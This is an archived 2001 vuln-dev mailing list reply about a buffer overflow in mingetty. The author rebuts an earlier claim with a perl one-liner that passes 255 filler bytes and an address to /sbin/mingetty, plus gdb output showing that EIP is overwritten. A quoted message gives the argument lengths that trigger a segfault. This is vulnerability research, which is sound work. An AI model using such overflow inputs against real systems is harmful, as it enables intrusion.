Vulnerability Development: Re: core dump on mingetty and getty

Re: core dump on mingetty and getty

From: G . Cohen <sor_at_rshell.org>
Date: Tue, 4 Dec 2001 01:31:02 +0200

On Mon, Dec 03, 2001 at 05:43:22PM -0200, Nelson Sampaio Araujo Junior wrote:
> I've detected it under Mandrake 8.1.
>
> Thus, this attack was not able to corrupt the EIP register, which is a good
> signal. It screws up the EAX and EDX registers.

Not true.
/sbin/mingetty `perl -e 'print "A" x 255, "\x94\x1c\x49\x80"'`
#0 0x80491c94 in ?? ()
(gdb) info registers eip
     eip: 0x80491c94 -2142692204

>
> Regards,
> Nelson Junior
> nelson_at_lunenetworks.com.br
> nelson_at_LUNE.com.br
>
> ----- Original Message -----
> From: "Ryan Yagatich" <ryany_at_procyon.pantek.com>
> Cc: <vuln-dev_at_security-focus.com>
> Sent: Monday, December 03, 2001 5:21 PM
> Subject: Re: core dump on mingetty and getty
>
>
> > $ cd ~
> > $ /sbin/mingetty `perl -e 'print "A" x 275'`
> > $ /sbin/mingetty `perl -e 'print "A" x 276'`
> > Segmentation fault
> > $ uname -a
> > Linux frodo.devel.lab 2.4.7-10 #1 ...
> >
> >
> >
Received on Dec 04 2001
